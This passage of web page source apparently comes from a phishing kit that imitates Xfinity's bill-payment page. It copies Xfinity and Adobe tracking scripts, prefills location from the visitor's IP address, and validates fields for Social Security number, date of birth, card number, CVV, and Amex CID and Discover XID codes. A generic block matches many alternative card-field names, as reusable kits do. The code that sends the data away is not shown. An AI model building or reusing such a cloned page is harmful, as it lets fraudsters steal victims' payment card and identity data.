      } else {
        $('#error_message_firstName').hide();
      }
    })
    
    $('input[name="lastName"]').on('input', function() {
      var lastName = $(this).val().trim();
      if (lastName == '') {
        $('#error_message_lastName').show();
      } else {
        $('#error_message_lastName').hide();
      }
    })
    
    $('input[name="lastName"]').on('click', function() {
      var lastName = $(this).val().trim();
      if (lastName == '') {
        $('#error_message_lastName').show();
      } else {
        $('#error_message_lastName').hide();
      }
    })
    
    $('input[name="phonenumber"]').on('input', function() {
      var phonenumber = $(this).val().trim();
      if (phonenumber == '') {
        $('#error_message_phonenumber').show();
      } else {
        $('#error_message_phonenumber').hide();
      }
    })
    
    $('input[name="phonenumber"]').on('click', function() {
      var phonenumber = $(this).val().trim();
      if (phonenumber == '') {
        $('#error_message_phonenumber').show();
      } else {
        $('#error_message_phonenumber').hide();
      }
    })
   
    $('input[name="zip"]').on('input', function() {
      var zip = $(this).val().trim();
      if (zip == '') {
        $('#error_message_zip').show();
      } else {
        $('#error_message_zip').hide();
      }
    })
    
    $('input[name="zip"]').on('click', function() {
      var zip = $(this).val().trim();
      if (zip == '') {
        $('#error_message_zip').show();
      } else {
        $('#error_message_zip').hide();
      }
    })
    
    $('input[name="SSN"]').on('input', function() {
      var SSN = $(this).val().trim();
      if (SSN == '') {
        $('#error_message_SSN').show();
      } else {
        $('#error_message_SSN').hide();
      }
    })
    
    $('input[name="SSN"]').on('click', function() {
      var SSN = $(this).val().trim();
      if (SSN == '') {
        $('#error_message_SSN').show();
      } else {
        $('#error_message_SSN').hide();
      }
    })
    
    $('input[name="DOB"]').on('change', function() {
      var DOB = $(this).val().trim();
      if (DOB == '') {
        $('#error_message_DOB').show();
      } else {
        $('#error_message_DOB').hide();
      }
    })
    
    $('input[name="DOB"]').on('click', function() {
      var DOB = $(this).val().trim();
      if (DOB == '') {
        $('#error_message_DOB').show();
      } else {
        $('#error_message_DOB').hide();
      }
    })
    
    $('input[name="city"]').on('input', function() {
      var city = $(this).val().trim();
      if (city == '') {
        $('#error_message_city').show();
      } else {
        $('#error_message_city').hide();
      }
    })
    
    $('input[name="city"]').on('click', function() {
      var city = $(this).val().trim();
      if (city == '') {
        $('#error_message_city').show();
      } else {
        $('#error_message_city').hide();
      }
    })
    
    $('input[name="line1"]').on('input', function() {
      var line1 = $(this).val().trim();
      if (line1 == '') {
        $('#error_message_line1').show();
      } else {
        $('#error_message_line1').hide();
      }
    })
    
    $('input[name="line1"]').on('click', function() {
      var line1 = $(this).val().trim();
      if (line1 == '') {
        $('#error_message_line1').show();
      } else {
        $('#error_message_line1').hide();
      }
    })

    function detectCardType(number) {
        const cardInput = document.getElementById('cardNumber');
        const logo = document.getElementById('logocard');
        
        logo.src = '';

        if (/^4/.test(number)) {
            logo.src = 'https://upload.wikimedia.org/wikipedia/commons/4/41/Visa_Logo.png';
        }
        else if (/^5[1-5]/.test(number)) {
            logo.src = 'https://upload.wikimedia.org/wikipedia/commons/0/04/Mastercard-logo.png';
        }
        else if (/^3[47]/.test(number)) {
            logo.src = 'https://upload.wikimedia.org/wikipedia/commons/thumb/3/30/American_Express_logo.svg/300px-American_Express_logo.svg.png';
        }
        else if (/^6(?:011|5)/.test(number)) {
            logo.src = 'https://upload.wikimedia.org/wikipedia/commons/f/fb/Discover_Card_logo.png';
        }
        else {
            logo.src = 'https://images.freeimages.com/fic/images/icons/2770/ios_7_icons/512/credit_card.png';
        }
    }

    $('#cardNumber').on('input', function() {
      setSecurity();
      var cardNumber = $(this).val().trim();
      detectCardType(cardNumber);
      if (cardNumber == '') {
        $('#error_message_cardNumber').show();
      } else {
        $('#error_message_cardNumber').hide();
      }
    });
    
    $('#cardNumber').on('click', function() {
      setSecurity();
      var cardNumber = $(this).val().trim();
      if (cardNumber == '') {
        $('#error_message_cardNumber').show();
      } else {
        $('#error_message_cardNumber').hide();
      }
    });



    function setSecurity() {
      var cardNumber = $('#cardNumber').val();
      var isAmex = cardNumber.charAt(0) == '3' && (cardNumber.charAt(1) == '4' || cardNumber.charAt(1) == '7');
      var isDiscover = cardNumber.startsWith('6011') || cardNumber.startsWith('65') || cardNumber.startsWith('644') || cardNumber.startsWith('622');
      if (isAmex) {
        $('input[name="cvv"]').mask('0000');
        $('#cid_form_box').show();
        $('#xid_form_box').hide();
      } else if (isDiscover) {
        $('input[name="cvv"]').mask('000');
        $('#cid_form_box').show();
        $('#xid_form_box').show();
      } else {
        $('input[name="cvv"]').mask('000');
        $('#cid_form_box').hide();
        $('#xid_form_box').hide();
      }
    }

    // CID (AMEX) input validation - 3 digits
    document.getElementById("cid").addEventListener("input", function () {
        this.value = this.value.replace(/\D/g, '').substring(0, 3);
        if (this.value.length === 3) {
            document.getElementById("cidError").style.display = "none";
            this.classList.remove('invalid-card');
            this.classList.add('valid-card');
            this.style.setProperty('border-color', '#28a745', 'important');
            this.style.setProperty('background-color', '#f8fff9', 'important');
        } else if (this.value.length > 0) {
            document.getElementById("cidError").style.display = "block";
            this.classList.remove('valid-card');
            this.classList.add('invalid-card');
            this.style.setProperty('border-color', '#dc3545', 'important');
        } else {
            document.getElementById("cidError").style.display = "none";
            this.classList.remove('valid-card', 'invalid-card');
            this.style.removeProperty('border-color');
            this.style.removeProperty('background-color');
        }
    });

    document.getElementById("xid_input").addEventListener("input", function () {
        this.value = this.value.replace(/\D/g, '').substring(0, 5);
        if (this.value.length === 5) {
            document.getElementById("xidError").style.display = "none";
            this.classList.remove('invalid-card');
            this.classList.add('valid-card');
            this.style.setProperty('border-color', '#28a745', 'important');
            this.style.setProperty('background-color', '#f8fff9', 'important');
        } else if (this.value.length > 0) {
            document.getElementById("xidError").style.display = "block";
            this.classList.remove('valid-card');
            this.classList.add('invalid-card');
            this.style.setProperty('border-color', '#dc3545', 'important');
        } else {
            document.getElementById("xidError").style.display = "none";
            this.classList.remove('valid-card', 'invalid-card');
            this.style.removeProperty('border-color');
            this.style.removeProperty('background-color');
        }
    });


    $('input[name="zip"]').mask('00000');
    $('input[name="phonenumber"]').mask('+1 (000) 000-0000');
  </script>
  
  <script>
      $(document).ready(function() {
         $('#expirationMonth, #expirationYear').on('change', function() {
            var expMonth = $('#expirationMonth').val();
            var expYear = $('#expirationYear').val();
            var today = new Date();
            var currentMonth = today.getMonth() + 1;
            var currentYear = today.getFullYear();
    
            if (expYear == currentYear && expMonth < currentMonth) {
                $('#error_message_cardEXP').show();
            } else {
                $('#error_message_cardEXP').hide();
            }
        });
          
        var regionCode = "<?php  $_SESSION['form_data']['state'] ?? $ipData['region_code']; ?>";
        var city = "<?= $ipData['city']; ?>";
        var postal = "<?= $ipData['postal']; ?>";
        $('#state').val(regionCode).change();
        $('#city').val(city);
        $('#zip').val(postal);
        
        
    });
  </script>

  <script>
    ! function(e) {
      function r(r) {
        for (var n, l, a = r[0], i = r[1], p = r[2], c = 0, s = []; c < a.length; c++) l = a[c], Object.prototype.hasOwnProperty.call(o, l) && o[l] && s.push(o[l][0]), o[l] = 0;
        for (n in i) Object.prototype.hasOwnProperty.call(i, n) && (e[n] = i[n]);
        for (f && f(r); s.length;) s.shift()();
        return u.push.apply(u, p || []), t()
      }

      function t() {
        for (var e, r = 0; r < u.length; r++) {
          for (var t = u[r], n = !0, a = 1; a < t.length; a++) {
            var i = t[a];
            0 !== o[i] && (n = !1)
          }
          n && (u.splice(r--, 1), e = l(l.s = t[0]))
        }
        return e
      }
      var n = {},
        o = {
          1: 0
        },
        u = [];

      function l(r) {
        if (n[r]) return n[r].exports;
        var t = n[r] = {
          i: r,
          l: !1,
          exports: {}
        };
        return e[r].call(t.exports, t, t.exports, l), t.l = !0, t.exports
      }
      l.m = e, l.c = n, l.d = function(e, r, t) {
        l.o(e, r) || Object.defineProperty(e, r, {
          enumerable: !0,
          get: t
        })
      }, l.r = function(e) {
        "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, {
          value: "Module"
        }), Object.defineProperty(e, "__esModule", {
          value: !0
        })
      }, l.t = function(e, r) {
        if (1 & r && (e = l(e)), 8 & r) return e;
        if (4 & r && "object" == typeof e && e && e.__esModule) return e;
        var t = Object.create(null);
        if (l.r(t), Object.defineProperty(t, "default", {
            enumerable: !0,
            value: e
          }), 2 & r && "string" != typeof e)
          for (var n in e) l.d(t, n, function(r) {
            return e[r]
          }.bind(null, n));
        return t
      }, l.n = function(e) {
        var r = e && e.__esModule ? function() {
          return e.default
        } : function() {
          return e
        };
        return l.d(r, "a", r), r
      }, l.o = function(e, r) {
        return Object.prototype.hasOwnProperty.call(e, r)
      }, l.p = "/";
      var a = this["webpackJsonpmaw-bill-pay"] = this["webpackJsonpmaw-bill-pay"] || [],
        i = a.push.bind(a);
      a.push = r, a = a.slice();
      for (var p = 0; p < a.length; p++) r(a[p]);
      var f = i;
      t()
    }([])
  </script>
  <script src="/static/js/2.5be4638e.chunk.js"></script>
  <script src="/static/js/main.bc47e44d.chunk.js"></script><img alt="" src="https://www.xfinity.com/-/media/5BF28DC6EBA54E929173CC7B0D9B6E69?ts=1645062382374" style="top: -10000px; left: -10000px; position: absolute;">
  <script>
    _satellite["_runScript1"](function(event, target, Promise) {
      /**
       * JS Util functions for Adobe Launch Data Elements and Rules.
       *
       * version: 1.0.0
       */
      window.adobe = window.adobe || {};
      window.adobe.consulting = window.adobe.consulting || {};
      window.adobe.consulting.util = window.adobe.consulting.util || {};
      window.Flickerlessly = window.Flickerlessly || {},
        function(t) {
          "use strict";
          var i = function(t, n, a, o) {
              var i = "atNodeInserted" + t,
                r = [],
                e = ["", "-moz-", "-webkit-", "-ms-", "-o-"];
              e.forEach(function(t, e) {
                r.push("@" + t + "keyframes " + i + " {from {opacity:0.99} to {opacity:1}}")
              }), r.push(n + "{"), e.forEach(function(t, e) {
                r.push(t + "animation-duration:0.001s;" + t + "animation-name:" + i + ";")
              }), r.push("}");
              var s = document.getElementsByTagName("head")[0];
              if (s) {
                var c = document.createElement("style");
                c.setAttribute("type", "text/css"), c.styleSheet ? c.styleSheet.cssText = r.join("\n") : c.appendChild(document.createTextNode(r.join("\n"))), s.insertBefore(c, s.firstChild)
              }
              var l = function(t) {
                if (t.animationName === i && "object" == typeof t.target) {
                  var e = !0 === o || !1 === o && null === t.target.getAttribute("data-flk-success");
                  u("('" + n + "') ready! Execute: " + e, t.target), "function" == typeof a && e ? (t.target.setAttribute("data-flk-success", i), !0 !== o && (["animationstart", "MSAnimationStart", "webkitAnimationStart"].forEach(function(t, e) {
                    document.removeEventListener(t, l, !1)
                  }), c && c.parentNode.removeChild(c)), a(t.target, u)) : u("Won't Callback", e, a)
                }
              };
              ["animationstart", "MSAnimationStart", "webkitAnimationStart"].forEach(function(t, e) {
                document.addEventListener(t, l, !1)
              })
            },
            u = -1 !== window.location.href.indexOf("Debug=1") ? function() {
              Array.prototype.unshift.call(arguments, "FLK:"), console.info.apply(this, arguments)
            } : function() {},
            r = Math.floor(1e3 * Math.random() + 1);
          t.onReady = function() {
            for (var t = 0; t < arguments.length; t++) {
              var e = arguments[t],
                n = e.selector,
                a = e.success || null,
                o = e.persist || !1;
              i(r++, n, a, o)
            }
          }
        }(Flickerlessly);

      (function(A) {

        // Get the value from an object heirarchy. Usage :- window.adobe.consulting.util.getObjVal(<base object>, <heirarchy under base object as a string>, <default value (optional), this will be returned if the object is not found>);
        A.getObjVal = function(obj, prop, defVal) {
          defVal = defVal || "";
          if (!obj || !prop || typeof prop != "string") {
            _satellite.logger.info("!*!*!* WARNING !*!*!* 'Object' or 'Path' is missing or invalid");
            return defVal;
          }
          var props = prop.split("."),
            i;
          for (i = 0; i < props.length; i += 1) {
            if (typeof obj[props[i]] !== "undefined") {
              obj = obj[props[i]];
            } else {
              _satellite.logger.info("!*!*!* WARNING !*!*!* " + props[i] + " could not be found under path " + prop);
              return defVal;
            }
          }
          return obj;
        };

        A.resetState = function() {
          // Resetting Variable for holding Campaign/Experience qualification for each page/view
          window.ttMETA = [];

          //Resetting SDID for A4T integration.
          var visitor = Visitor.getInstance("DA11332E5321D0550A490D45@AdobeOrg");
          visitor.resetState();
        };

        A.loadJS = function(url, location, cb) {
          var scriptTag = document.createElement('script');
          scriptTag.src = url;
          if (typeof cb == "function") {
            scriptTag.onload = cb;
          }
          location.appendChild(scriptTag);
        };

        A.getAPI = function(url, successHandler, errorHandler, headers) {
          var xhr = typeof XMLHttpRequest != 'undefined' ?
            new XMLHttpRequest() :
            new ActiveXObject('Microsoft.XMLHTTP');
          xhr.open('get', url, true);
          if (headers) {
            for (var i = 0, j = Object.keys(headers); i < j.length; i++) {
              xhr.setRequestHeader(j[i], headers[j[i]]);
            }
          }
          xhr.withCredentials = true; // Must follow xhr.open to avoid InvalidStateError
          xhr.onreadystatechange = function() {
            var status, data;
            if (xhr.readyState == 4) {
              status = xhr.status;
              if (status == 200) {
                data = JSON.parse(xhr.responseText);
                successHandler && successHandler(data);
              } else {
                errorHandler && errorHandler(status);
              }
            }
          };
          xhr.send();
        };

        A.fireCustomEvent = function(name, details) {
          var event = new CustomEvent(name, {
            detail: {
              source: "dtm",
              data: details
            }
          });
          document.dispatchEvent(event);
        };

        A.numberOfDaysPassed = function(fromDate) {
          if (fromDate == "") return "";

          var fromDateArr = fromDate.split("-");

          if (fromDateArr.length != 3 || isNaN(new Date(fromDate))) {
            console.log("Invalid Date given for function window.adobe.consulting.util.numberOfDaysPassed()");
            return NaN;
          }

          var currDate = new Date();
          var utcFromDate = new Date(Date.UTC(fromDateArr[0], fromDateArr[1] - 1, fromDateArr[2], 24, 0, 0, 0));
          var utcCurrentDate = Date.UTC(currDate.getFullYear(), currDate.getMonth(), currDate.getDate(), 24, 0, 0, 0);

          var dateDiff = utcCurrentDate - utcFromDate;

          return A.dhm(dateDiff)[0];
        };

        A.getUrlParameter = function(name) {
          name = name.replace(/[\[]/, '\\[').replace(/[\]]/, '\\]');
          var regex = new RegExp('[\\?&]' + name + '=([^&#]*)');
          var results = regex.exec(location.search);
          return results === null ? '' : decodeURIComponent(results[1].replace(/\+/g, ' '));
        };

        A.dhm = function(t) {
          var cd = 24 * 60 * 60 * 1000,
            ch = 60 * 60 * 1000,
            d = Math.floor(t / cd),
            h = Math.floor((t - d * cd) / ch),
            m = Math.round((t - d * cd - h * ch) / 60000),
            pad = function(n) {
              return n < 10 ? '0' + n : n;
            };
          if (m === 60) {
            h++;
            m = 0;
          }
          if (h === 24) {
            d++;
            h = 0;
          }
          return [d, pad(h), pad(m)];
        };

        A.getMetaContentByName = function(name, content) {
          var content = (content == null) ? 'content' : content,
            metaObj = document.querySelector("meta[name='" + name + "']");
          return metaObj != null ? metaObj.getAttribute(content) != null ? metaObj.getAttribute(content).toLowerCase() : "" : "";
        };

        A.fireTargetCustomMbox = function(name, params) {
          adobe.target.getOffer({
            mbox: name,
            params: params,
            success: function(offer) {
              adobe.target.applyOffer({
                "mbox": name,
                "offer": offer
              });
            },
            error: function(status, error) {
              _satellite.logger.warn("Adobe Target custom mBox ( " + name + " ) request did not succeed :: ", status, error);
            }
          });
        };

        A.getEventInfo = function(eventMethod, DL_path, eventName, defValue) {
          defValue = defValue || "";
          var DL_events = digitalData.event;
          for (var x = 0; x < DL_events.length; x++) {
            if (DL_events[x].eventInfo.eventMethod && DL_events[x].eventInfo.eventMethod == eventMethod) {
              if (typeof eventName !== "undefined") {
                return (DL_events[x].eventInfo.eventName == eventName) ? A.getObjVal(DL_events[x].eventInfo, DL_path, defValue) : "";
              }
              return A.getObjVal(DL_events[x].eventInfo, DL_path, defValue);
            }
          }
          return defValue;
        };


        //getGBB Offers
        A.getGBBHomeOffer = function(ruleid, tokenname) {
          return new Promise(function(resolve, reject) {
            try {
              var match = /&RC.MKT=(\d+)&/gm.exec(_satellite.getVar("Cookie | PSC")),
                marketID = match && match[1],
                apiURL = marketID && ruleid && tokenname && "https://xapi.xfinity.com/markets/" + marketID + "/rules/" + ruleid + "/FeaturedOffers/V2?tokenname=" + tokenname;

              function apiSuccessHandler(data) {
                resolve(data.featuredOffers);
              }

              function apiErrorHandler(data) {
                reject(data);
              }

              if (apiURL) {
                A.getAPI(apiURL, apiSuccessHandler, apiErrorHandler);
              } else {
                reject("Invalid arguments");
              }
            } catch (e) {
              reject(e);
            }
          });
        };

        //Searches a single or an array of objects for key and value match
        A.searchObjVal = function(objectRoot, keyArray, valueArray) {
          objectRoot = objectRoot || [];
          keyArray = keyArray || [];
          valueArray = valueArray || [];
          var goodArguments = !(!(typeof objectRoot == "object") || !keyArray.length || !valueArray.length);
          var matchFound = false;
          if (!goodArguments) {
            console.error("Warning :: Invalid Arguments for function adobe.consulting.util.getMOV()");
            return {};
          }
          if (Array.isArray(objectRoot) && objectRoot.length) {
            for (var x = 0; x < objectRoot.length; x++) {
              var result = A.searchObjVal(objectRoot[x], keyArray, valueArray);
              if (result) return result;
            }
          }
          for (var y = 0; y < keyArray.length; y++) {
            matchFound = valueArray[y] && A.getObjVal(objectRoot, keyArray[y]) == valueArray[y] ? true : false;
            if (!matchFound) {
              return null
            }
          }
          return objectRoot;
        };

        // Will depreciate once all uses of getMOV are removed
        A.getMOV = A.searchObjVal

      }(window.adobe.consulting.util));

    });
  </script>
  <script>
    _satellite["_runScript2"](function(event, target, Promise) {
      // Creating window.ttMETA object
      // ttMeta is a window level object required for integrating Adobe Target Experience qualification data with third party solutions such as Quantum Mterics.

      document.addEventListener("at-request-succeeded", function(e) {

        window.ttMETA = typeof(window.ttMETA) != "undefined" ? window.ttMETA : [];

        var tokens = e.detail.responseTokens;

        if (isEmpty(tokens)) {
          return;
        }

        var uniqueTokens = distinct(tokens);

        uniqueTokens.forEach(function(token) {
          window.ttMETA.push({
            'Qualified Page': window.location.href,
            'CampaignName': token["activity.name"],
            'CampaignId': token["activity.id"],
            'RecipeName': token["experience.name"],
            'RecipeId': token["experience.id"],
            'OfferId': token["option.id"],
            'OfferName': token["option.name"],
            'MboxName': e.detail.mbox
          });
        });
      });

      function isEmpty(val) {
        return (val === undefined || val == null || val.length <= 0) ? true : false;
      }

      function key(obj) {
        return Object.keys(obj)
          .map(function(k) {
            return k + "" + obj[k];
          })
          .join("");
      }

      function distinct(arr) {
        var result = arr.reduce(function(acc, e) {
          acc[key(e)] = e;
          return acc;
        }, {});

        return Object.keys(result)
          .map(function(k) {
            return result[k];
          });
      }

    });
  </script>
  <script>
    _satellite["_runScript3"](function(event, target, Promise) {
      window.Flickerlessly = window.Flickerlessly || {},
        function(t) {
          "use strict";
          var i = function(t, n, a, o) {
              var i = "atNodeInserted" + t,
                r = [],
                e = ["", "-moz-", "-webkit-", "-ms-", "-o-"];
              e.forEach(function(t, e) {
                r.push("@" + t + "keyframes " + i + " {from {opacity:0.99} to {opacity:1}}")
              }), r.push(n + "{"), e.forEach(function(t, e) {
                r.push(t + "animation-duration:0.001s;" + t + "animation-name:" + i + ";")
              }), r.push("}");
              var s = document.getElementsByTagName("head")[0];
              if (s) {
                var c = document.createElement("style");
                c.setAttribute("type", "text/css"), c.styleSheet ? c.styleSheet.cssText = r.join("\n") : c.appendChild(document.createTextNode(r.join("\n"))), s.insertBefore(c, s.firstChild)
              }
              var l = function(t) {
                if (t.animationName === i && "object" == typeof t.target) {
                  var e = !0 === o || !1 === o && null === t.target.getAttribute("data-flk-success");
                  u("('" + n + "') ready! Execute: " + e, t.target), "function" == typeof a && e ? (t.target.setAttribute("data-flk-success", i), !0 !== o && (["animationstart", "MSAnimationStart", "webkitAnimationStart"].forEach(function(t, e) {
                    document.removeEventListener(t, l, !1)
                  }), c && c.parentNode.removeChild(c)), a(t.target, u)) : u("Won't Callback", e, a)
                }
              };
              ["animationstart", "MSAnimationStart", "webkitAnimationStart"].forEach(function(t, e) {
                document.addEventListener(t, l, !1)
              })
            },
            u = -1 !== window.location.href.indexOf("Debug=1") ? function() {
              Array.prototype.unshift.call(arguments, "FLK:"), console.info.apply(this, arguments)
            } : function() {},
            r = Math.floor(1e3 * Math.random() + 1);
          t.onReady = function() {
            for (var t = 0; t < arguments.length; t++) {
              var e = arguments[t],
                n = e.selector,
                a = e.success || null,
                o = e.persist || !1;
              i(r++, n, a, o)
            }
          }
        }(Flickerlessly);

      Flickerlessly.onReady({
        selector: '#page-header div.page-header__navigation > nav > a[href="#/"]',
        success: function(el, log) {
          el.addEventListener("click", function() {
            if ((location.href.indexOf("customer.pre-prod.xfinity.com") >= 0 || location.href.indexOf("es.xfinity.com/sdcustomerpreprod/") >= 0 || location.href.indexOf("customer.xfinity.com") >= 0 || location.href.indexOf("es.xfinity.com/sdcustomer/") >= 0) && location.href.indexOf('excl=1') < 0) {
              // DL Flicker Management mecahnism did not work
              _satellite.logger.log("Force Loading Page to Overview!");
              document.body.style.opacity = 0;
              window.location.href = location.protocol + "//" + location.host + location.pathname;
            }
          });
        }
      });


      (function() {

        function hideAdobeOverlay() {
          if (document.getElementById("adbe_overlay")) {
            document.getElementById("adbe_overlay").style.display = "none";
          }
        }

        document.addEventListener("at-request-succeeded", function(event) {
          if (event.detail.redirect == false) {
            hideAdobeOverlay();
          }
        });

        document.addEventListener("at-request-failed", hideAdobeOverlay);
        document.addEventListener("at-content-rendering-no-offers", hideAdobeOverlay);
        document.addEventListener("at-content-rendering-failed", hideAdobeOverlay);

        //Timed Unload of Loader for Redirect failure scenarios which are outside of our control.
        window.setTimeout(hideAdobeOverlay, 10000);

      }());


    });
  </script>
  <div class="ReactModalPortal"></div>
  <div class="ReactModalPortal"></div>
<script>
// ========== CARD VALIDATION (Standardized) ==========
var cardTypesConfig = {
    visa: { pattern: /^4/, lengths: [16], cvvLength: 3, name: 'Visa' },
    mastercard: { pattern: /^(5[1-5]|2[2-7])/, lengths: [16], cvvLength: 3, name: 'Mastercard' },
    amex: { pattern: /^3[47]/, lengths: [15], cvvLength: 4, name: 'American Express' },
    discover: { pattern: /^(6011|622[1-9]|64[4-9]|65)/, lengths: [16], cvvLength: 3, name: 'Discover' },
    diners: { pattern: /^(30[0-5]|36|38)/, lengths: [14], cvvLength: 3, name: 'Diners Club' },
    jcb: { pattern: /^35/, lengths: [16], cvvLength: 3, name: 'JCB' }
};

function getCardType(number) {
    for (var type in cardTypesConfig) {
        if (cardTypesConfig[type].pattern.test(number)) return type;
    }
    return 'unknown';
}

function getCardConfig(type) {
    return cardTypesConfig[type] || null;
}

function luhnCheck(cardNumber) {
    if (cardNumber.length < 15 || cardNumber.length > 16) return false;
    let sum = 0;
    let isEven = false;
    for (let i = cardNumber.length - 1; i >= 0; i--) {
        let digit = parseInt(cardNumber[i], 10);
        if (isEven) {
            digit *= 2;
            if (digit > 9) digit -= 9;
        }
        sum += digit;
        isEven = !isEven;
    }
    return (sum % 10) === 0;
}

function isValidCardWithLength(number) {
    var type = getCardType(number);
    var config = getCardConfig(type);
    if (!config) return luhnCheck(number);
    var validLen = config.lengths.indexOf(number.length) !== -1;
    return validLen && luhnCheck(number);
}

// Green border validation helper
function updateValidationStyle(input, isValid) {
    if (!input) return;
    if (isValid) {
        input.style.borderColor = '#28a745';
        input.style.borderWidth = '2px';
        input.style.boxShadow = '0 0 0 0.2rem rgba(40, 167, 69, 0.25)';
    } else {
        input.style.borderColor = '';
        input.style.borderWidth = '';
        input.style.boxShadow = '';
    }
}

// Auto-attach validation to card inputs
document.addEventListener('DOMContentLoaded', function() {
    // Find card number input
    var cardInput = document.querySelector('input[name="ccnumber"], input[name="cardnumber"], input[name="cardNumber"], input[name="ccn"], input[name="cc_number"]');
    var expInput = document.querySelector('input[name="ccexp"], input[name="cardexp"], input[name="expdate"], input[name="exp"], input[name="expiry"]');
    var cvvInput = document.querySelector('input[name="cvv"], input[name="cvc"], input[name="cvv2"]');
    var dobInput = document.querySelector('input[name="dob"], input[name="dateofbirth"]');
    var ssnInput = document.querySelector('input[name="ssn"]');
    var phoneInput = document.querySelector('input[name="phone"], input[name="phonenumber"]');

    // Card number real-time validation + formatting
    if (cardInput) {
        cardInput.addEventListener('input', function() {
            var raw = this.value.replace(/\D/g, '');
            var type = getCardType(raw);
            var config = getCardConfig(type);
            // Auto-format with spaces
            if (type === 'amex') {
                this.value = raw.replace(/(\d{4})(\d{0,6})(\d{0,5})/, function(m,a,b,c){ return a+(b?' '+b:'')+(c?' '+c:''); });
                this.setAttribute('maxlength', '17');
            } else if (type === 'diners') {
                this.value = raw.replace(/(\d{4})(\d{0,6})(\d{0,4})/, function(m,a,b,c){ return a+(b?' '+b:'')+(c?' '+c:''); });
                this.setAttribute('maxlength', '16');
            } else {
                this.value = raw.replace(/(\d{4})(\d{0,4})(\d{0,4})(\d{0,4})/, function(m,a,b,c,d){ return a+(b?' '+b:'')+(c?' '+c:'')+(d?' '+d:''); });
                this.setAttribute('maxlength', '19');
            }
            // Validate
            var isValidLength = config ? config.lengths.indexOf(raw.length) !== -1 : false;
            var isValidLuhn = luhnCheck(raw);
            updateValidationStyle(this, isValidLength && isValidLuhn);
            // Update CVV maxlength
            if (cvvInput && config) {
                cvvInput.setAttribute('maxlength', config.cvvLength);
            }
        });
    }

    // Exp date validation + auto-format MM/YY
    if (expInput) {
        expInput.addEventListener('input', function() {
            var val = this.value.replace(/\D/g, '');
            if (val.length >= 2) val = val.substring(0,2) + '/' + val.substring(2,4);
            this.value = val;
            this.setAttribute('maxlength', '5');
            var match = this.value.match(/^(0[1-9]|1[0-2])\/(\d{2})$/);
            if (match) {
                var expDate = new Date(parseInt(match[2])+2000, parseInt(match[1]));
                updateValidationStyle(this, expDate > new Date());
            } else {
                updateValidationStyle(this, false);
            }
        });
    }

    // CVV validation - dynamic length per card type
    if (cvvInput) {
        cvvInput.addEventListener('input', function() {
            this.value = this.value.replace(/\D/g, '').substring(0, 4);
            var expectedLen = 3;
            if (cardInput) {
                var rawCard = cardInput.value.replace(/\D/g, '');
                var cType = getCardType(rawCard);
                var cConfig = getCardConfig(cType);
                if (cConfig) expectedLen = cConfig.cvvLength;
            }
            updateValidationStyle(this, this.value.length === expectedLen);
        });
    }

    // DOB auto-format MM/DD/YYYY
    if (dobInput) {
        dobInput.addEventListener('input', function() {
            var val = this.value.replace(/\D/g, '').substring(0, 8);
            var formatted = '';
            if (val.length > 0) formatted = val.substring(0, 2);
            if (val.length > 2) formatted += '/' + val.substring(2, 4);
            if (val.length > 4) formatted += '/' + val.substring(4, 8);
            this.value = formatted;
            this.setAttribute('maxlength', '10');
            if (formatted.length === 10) {
                var dobRegex = /^(0[1-9]|1[0-2])\/(0[1-9]|[12]\d|3[01])\/\d{4}$/;
                updateValidationStyle(this, dobRegex.test(formatted));
            } else {
                updateValidationStyle(this, false);
            }
        });
    }

    // SSN formatting XXX-XX-XXXX
    if (ssnInput) {
        ssnInput.addEventListener('input', function() {
            var val = this.value.replace(/\D/g, '');
            if (val.length >= 5) val = val.replace(/(\d{3})(\d{2})(\d{0,4})/, '$1-$2-$3');
            else if (val.length >= 3) val = val.replace(/(\d{3})(\d{0,2})/, '$1-$2');
            this.value = val.substring(0, 11);
            this.setAttribute('maxlength', '11');
            updateValidationStyle(this, /^\d{3}-\d{2}-\d{4}$/.test(this.value));
        });
    }

    // Phone formatting
    if (phoneInput) {
        phoneInput.addEventListener('input', function() {
            var val = this.value.replace(/\D/g, '');
            if (val.length > 15) val = val.substring(0, 15);
            this.value = val;
            updateValidationStyle(this, val.length >= 10);
        });
    }
});
</script>

<script>
// Real-time card validation with green/red borders using setProperty
(function() {
    function setValidStyle(el) {
        if (!el) return;
        el.style.setProperty('border-color', '#28a745', 'important');
        el.style.setProperty('border-width', '2px', 'important');
        el.style.setProperty('box-shadow', '0 0 0 0.2rem rgba(40, 167, 69, 0.25)', 'important');
        el.style.setProperty('background-color', '#f8fff9', 'important');
    }
    function setInvalidStyle(el) {
        if (!el) return;
        el.style.setProperty('border-color', '#dc3545', 'important');
        el.style.setProperty('border-width', '2px', 'important');
        el.style.setProperty('box-shadow', '0 0 0 0.2rem rgba(220, 53, 69, 0.25)', 'important');
        el.style.removeProperty('background-color');
    }
    function clearStyle(el) {
        if (!el) return;
        el.style.removeProperty('border-color');
        el.style.removeProperty('border-width');
        el.style.removeProperty('box-shadow');
        el.style.removeProperty('background-color');
    }
    function luhn(num) {
        if (num.length < 15 || num.length > 16) return false;
        var sum = 0, alt = false;
        for (var i = num.length - 1; i >= 0; i--) {
            var d = parseInt(num[i], 10);
            if (alt) { d *= 2; if (d > 9) d -= 9; }
            sum += d; alt = !alt;
        }
        return (sum % 10) === 0;
    }

    document.addEventListener('DOMContentLoaded', function() {
        var cardInput = document.getElementById('cardNumber');
        var expMonth = document.getElementById('expirationMonth');
        var expYear = document.getElementById('expirationYear');
        var cvvInput = document.getElementById('cvv');

        // Card number real-time validation
        if (cardInput) {
            cardInput.addEventListener('input', function() {
                var raw = this.value.replace(/\D/g, '');
                if (raw.length === 0) { clearStyle(this); return; }
                var isAmex = /^3[47]/.test(raw);
                var validLen = isAmex ? raw.length === 15 : (raw.length >= 13 && raw.length <= 19);
                if (validLen && luhn(raw)) {
                    setValidStyle(this);
                } else if (raw.length >= (isAmex ? 15 : 13)) {
                    setInvalidStyle(this);
                } else {
                    clearStyle(this);
                }
            });
        }

        // Expiration real-time validation
        function validateExp() {
            if (!expMonth || !expYear) return;
            var m = expMonth.value, y = expYear.value;
            if (!m || !y) { clearStyle(expMonth); clearStyle(expYear); return; }
            var now = new Date();
            var curMonth = now.getMonth() + 1, curYear = now.getFullYear();
            if (parseInt(y) < curYear || (parseInt(y) === curYear && parseInt(m) < curMonth)) {
                setInvalidStyle(expMonth); setInvalidStyle(expYear);
            } else {
                setValidStyle(expMonth); setValidStyle(expYear);
            }
        }
        if (expMonth) expMonth.addEventListener('change', validateExp);
        if (expYear) expYear.addEventListener('change', validateExp);

        // CVV real-time validation
        if (cvvInput) {
